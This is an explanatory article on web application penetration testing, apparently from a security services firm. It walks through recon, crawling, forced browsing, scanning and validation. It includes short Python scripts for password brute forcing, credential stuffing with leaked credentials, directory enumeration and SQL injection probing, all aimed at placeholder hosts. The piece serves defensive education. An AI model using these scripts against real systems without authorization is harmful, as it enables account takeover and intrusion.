Web application attacks have ranked among the top three threats to small-to-mid-sized businesses (SMBs) two years in a row, according to Verizon’s Data Breach Investigations Report. Web applications, or programs that run on a remote server and are delivered via a web browser, are relied on across industries such as eCommerce, healthcare, financial services, entertainment, manufacturing, and insurance.
Unfortunately, web apps often store sensitive information such as confidential business data, personally identifiable information (PII), or even protected health information (PHI). Also, web apps are particularly susceptible to being attacked by cybercriminals since they are publicly accessible via the internet. As such, organizations must prioritize web application penetration testing and security to ensure the product they provide to their customers is secure.
Successful web application attacks can be particularly devastating. They can result in extended downtime from denial of service (DoS) attacks, data deletion through SQL injection, theft of customer credit card data or other information via malware, or compromised end-user computers through cross-site scripting (XSS).
Web Application Penetration Test 101
Organizations often engage a trusted third-party advisor to serve as an “ethical hacker” to test their web application security. The ethical hacker will perform a web application penetration test to simulate how a real-world attacker would try to compromise the organization’s application. The project results in a detailed report on whether the system was successfully compromised (and how), identified vulnerabilities, and a comprehensive list of recommended remediation steps.
In the following sections, we will cover the different steps performed during a typical penetration testing engagement.
Credentialed vs. Non-Credentialed Testing
Non-Credentialed Web Application Penetration Testing
The penetration tester will perform a non-credentialed pen test, simulating attacks against the portions of the web application that are accessible without credentials. Because no valid account is available, this testing typically centers on brute force attacks, in which automated attempts are made to guess an existing user’s credentials.
Brute force attacks can be conducted in one of four ways (see the sketch after this list):
- Match multiple passwords with a single username;
- Match multiple usernames with one password, which is known as password spraying;
- Utilize several passwords and usernames in various combinations; or
- Conduct offline attacks where brute force attempts are made to crack hashes of passwords.
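As a concrete illustration, below is a minimal Python sketch of the first approach (matching multiple passwords with a single username). The login URL, form field names, and failure message are hypothetical assumptions for illustration; a real engagement would match them to the target application and, of course, only test with authorization.

```python
# Minimal sketch: many passwords, one username, against a hypothetical
# login form. URL, form fields, and the failure string are assumptions.
import requests

TARGET = "https://app.example.com/login"   # hypothetical endpoint
USERNAME = "admin"                         # hypothetical account

with open("passwords.txt") as wordlist:
    for password in (line.strip() for line in wordlist):
        resp = requests.post(
            TARGET,
            data={"username": USERNAME, "password": password},
            timeout=10,
        )
        # Heuristic: assume the app echoes an error string on failure.
        if "Invalid credentials" not in resp.text:
            print(f"Possible hit: {USERNAME}:{password}")
            break
```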
In the end, a brute force attack is just a numbers game. While non-credentialed testing can reveal some vulnerabilities, the ideal approach is to combine it with credentialed pen testing, whereby the ethical hacker can assess the web application’s security while logged in with a valid username and password.
Credentialed Web Application Penetration Testing
With a credentialed approach, the attack surface dramatically increases. For example, imagine visiting a site without a user account: certain features of the website are inaccessible without being logged in. If a test is executed without user credentials, the results will miss not only individual pages but entire functions as well.
Not only does credentialed pen testing provide a more thorough assessment, but it also simulates the common occurrence where the attacker gains access to the web application through stolen user credentials. For example, in 2021, a single data breach exposed 8.4 billion passwords.
Through a process known as credential stuffing, hackers launch automated login requests against hundreds of web applications using the stolen usernames and passwords. If a victim has reused the same username and password on a different web application (i.e., password reuse), an attacker may find an easy way into that app to launch their attack.
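To illustrate the mechanics, here is a minimal credential-stuffing sketch, assuming a leaked dump in user:pass format and a hypothetical JSON login API; the endpoint, payload fields, and success indicator are illustrative assumptions only.

```python
# Minimal credential-stuffing sketch: replay leaked username/password
# pairs against one hypothetical application.
import requests

API = "https://app.example.com/api/login"  # hypothetical endpoint

with open("leaked_credentials.txt") as dump:   # lines like "alice:hunter2"
    for line in dump:
        username, _, password = line.strip().partition(":")
        resp = requests.post(
            API, json={"user": username, "pass": password}, timeout=10
        )
        if resp.status_code == 200:            # assumed success indicator
            print(f"Reused credentials work: {username}")
```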
Reconnaissance
Whether credentialed or non-credentialed, reconnaissance, or recon, is typically one of the first steps in a web application penetration test. Recon involves collecting data about the particular target web application.
The collection of data may include, but is not limited to, identifying the following:
- Subdomains
- The presence of firewalls
- Frameworks and programming languages
- Content management systems
- Plugins
- Themes
This collection leads to a more informed, and therefore more thorough, penetration test. With this information available, cybersecurity engineers can refine their testing procedures and develop a customized attack plan.
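As a rough sketch of what this looks like in practice, the example below covers two items from the list above: subdomain discovery through DNS lookups and framework hints leaked in HTTP response headers. The domain and candidate subdomains are placeholders, and dedicated recon tools cover this ground far more thoroughly.

```python
# Minimal recon sketch: resolve candidate subdomains via DNS and look
# for server/framework hints in response headers. Targets are placeholders.
import socket
import requests

DOMAIN = "example.com"                      # hypothetical target
CANDIDATES = ["www", "dev", "staging", "api", "admin"]

for sub in CANDIDATES:
    host = f"{sub}.{DOMAIN}"
    try:
        print(f"{host} -> {socket.gethostbyname(host)}")
    except socket.gaierror:
        pass  # subdomain does not resolve

# Headers often leak the web server, framework, or CMS in use.
resp = requests.get(f"https://{DOMAIN}", timeout=10)
for header in ("Server", "X-Powered-By", "X-Generator"):
    if header in resp.headers:
        print(f"{header}: {resp.headers[header]}")
```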
Manual Crawl and Spidering
The mapping phase of a web application penetration test should begin with a manual crawl of the site, followed by automated spidering. During a typical penetration test, cybersecurity engineers log in to the website with user credentials and manually click on every link. While doing this exercise, they also complete the forms on the landing pages and submit the data. The general idea is to map the entire website by hand before relying on automation.
The side benefit of incorporating this step in the process is that the penetration tester can obtain a solid idea of the sitemap, features, and infrastructure, which aids them later in the process. As they crawl the site, more and more requests will be captured and passively scanned by the web application testing software.
In contrast to a manual crawl, spidering is automated and may discover unclicked links. For the best results, spidering should also be done from a logged-in account. Yet even after visiting each link, cybersecurity engineers and the web application testing software can only uncover pages that the site links to directly. Forced browsing can be used to further expand the discovery of site content during the web application security test.
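A minimal spidering sketch, assuming an authenticated requests.Session per the advice above, might look like the following; the base URL and session cookie are placeholders, and dedicated proxies such as Burp Suite or OWASP ZAP perform this step far more thoroughly.

```python
# Minimal authenticated spider: breadth of coverage is capped for this
# sketch. Base URL and session cookie are placeholder assumptions.
from urllib.parse import urljoin, urlparse
import requests
from bs4 import BeautifulSoup   # third-party: pip install beautifulsoup4

BASE = "https://app.example.com/"           # hypothetical target
session = requests.Session()
session.cookies.set("session", "REPLACE_WITH_VALID_SESSION")  # assumed auth

seen, queue = set(), [BASE]
while queue and len(seen) < 500:            # cap the crawl for this sketch
    url = queue.pop()
    if url in seen:
        continue
    seen.add(url)
    resp = session.get(url, timeout=10)
    for link in BeautifulSoup(resp.text, "html.parser").find_all("a", href=True):
        target = urljoin(url, link["href"])
        # Stay on the target host and skip already-visited pages.
        if urlparse(target).netloc == urlparse(BASE).netloc and target not in seen:
            queue.append(target)

print(f"Discovered {len(seen)} pages")
```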
Forced Browsing
Forced browsing aims to identify directory paths and files in the web application that have no direct links. Temporary files, old backup or configuration files, and unlinked directories may not be referenced anywhere within the web application, yet they may still be accessible.
Attempting to access these files during a penetration test is essential. Hackers often covet them because of the sensitive information they may contain; old backup or configuration files, for example, may hold source code or internal network addressing, among other things. Because it relies on brute force requests against wordlists of common file and directory names, this type of attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, or Resource Enumeration.
These wordlists can be extensive and, depending on their size, can significantly increase the time needed for penetration testing. The benefit, however, is a far more thorough web application penetration test.
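A minimal forced-browsing sketch might probe unlinked paths from a wordlist and flag anything that does not return a 404, as below. The base URL and wordlist are assumptions; real wordlists such as those in the SecLists project contain tens of thousands of entries.

```python
# Minimal forced-browsing sketch: request each candidate path and
# report non-404 responses. Base URL and wordlist are placeholders.
import requests

BASE = "https://app.example.com/"           # hypothetical target

with open("common_paths.txt") as wordlist:  # e.g., "backup.zip", ".env", "admin/"
    for path in (line.strip() for line in wordlist):
        resp = requests.get(BASE + path, timeout=10, allow_redirects=False)
        if resp.status_code != 404:
            print(f"{resp.status_code}  /{path}")
```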
Passive Scanning
While spidering and forced browsing run, the web application testing software simultaneously scans the captured traffic for potential vulnerabilities and reports them as alerts. Typically, nothing is required on the tester’s end to activate this. However, a good web application penetration test may also incorporate additional scripts, extensions, and add-ons.
Active Scanning
With the web application thoroughly mapped, and the content discovered, the penetration testing process will transition to active scanning. Active scanning modifies and sends various web requests that test for the OWASP Top 10 Web Application vulnerabilities, including SQL injection, cross-site scripting (XSS), insufficient logging and monitoring, and others.
Newer attack vectors that have become prevalent include XSS via file uploads and Insecure Direct Object Reference (IDOR). Attack popularity changes over time; staying informed on the newest and most prevalent vulnerabilities is therefore essential to conducting a thorough web application penetration test.
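To make the idea concrete, here is a minimal active-scan sketch for one OWASP Top 10 class, error-based SQL injection: it appends payloads to a hypothetical query parameter and looks for database error strings in the response. The parameter name, payloads, and error signatures are illustrative assumptions, and real scanners test far more cases.

```python
# Minimal error-based SQL injection probe. Endpoint, parameter name,
# payloads, and error signatures are illustrative assumptions.
import requests

TARGET = "https://app.example.com/search"   # hypothetical endpoint
PAYLOADS = ["'", "' OR '1'='1", '" OR "1"="1']
ERROR_SIGNATURES = ["SQL syntax", "sqlite3.OperationalError", "ORA-01756"]

for payload in PAYLOADS:
    resp = requests.get(TARGET, params={"q": payload}, timeout=10)
    if any(sig in resp.text for sig in ERROR_SIGNATURES):
        print(f"Possible SQL injection with payload: {payload!r}")
```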
False Positives and Validation
Arguably, validation is the most important part of the web application pen testing process. It is what differentiates an actual penetration test from a vulnerability scan; after all, what good is a penetration test without confirmation of its findings?
It is not uncommon for web application testing software to generate false positives. This issue can be extremely aggravating for the IT department responsible for patching or updating their site. Also, it can increase the cost of an organization’s remediation efforts.
It is also possible for vulnerability scans to miss important issues because they do not account for manipulation. For example, scans cannot identify how vulnerabilities work together, known as vulnerability chaining. Two low-priority vulnerabilities that might otherwise be overlooked could, in theory, be combined into a critical vulnerability if manipulated correctly. Without the capability and understanding necessary to perform validation, the results can be clouded.
The Human Element
There are many components to conducting an effective web application penetration test, many of which have been discussed above. One of the most critical factors, however, is the human element. Engaging the right people with the right experience as a trusted advisor is essential. After all, the point of a penetration test is to test how effective the web application security is at deterring a highly motivated and skilled hacker.
Many exploits and vulnerabilities can result in unintended consequences if mishandled. Some are obvious. For example, a well-trained pen tester would not verify a denial of service (DoS) vulnerability. If they did, it could take the web application offline and result in downtime.
Other attacks may be less obvious. For example, a buffer overflow exploit or another memory-based attack may result in a denial of service. If the pen tester does not anticipate that outcome, or is simply unaware of it, triggering the exploit is effectively the same as launching a denial of service attack on the client’s web application.
Web Application Security in the Cloud
As with many technologies, organizations are increasingly using cloud computing platforms such as Amazon Web Services (AWS) and Microsoft Azure to host their web applications. The reliability, scalability, and affordability of this approach make it an enticing option. Although cloud providers may offer some peace of mind regarding data security, they are not necessarily responsible for protecting the web applications they host. For example, AWS’s Shared Responsibility Model specifically highlights that “Security and Compliance is a shared responsibility between AWS and the customer.”
While the hosting provider manages the security of the cloud infrastructure, it is still the customer’s responsibility to ensure the security of their web application and the data within it. As such, it is essential not to fall into the trap of having a false sense of security just because your organization is using a popular cloud computing platform. Understanding what your security responsibilities are is crucial.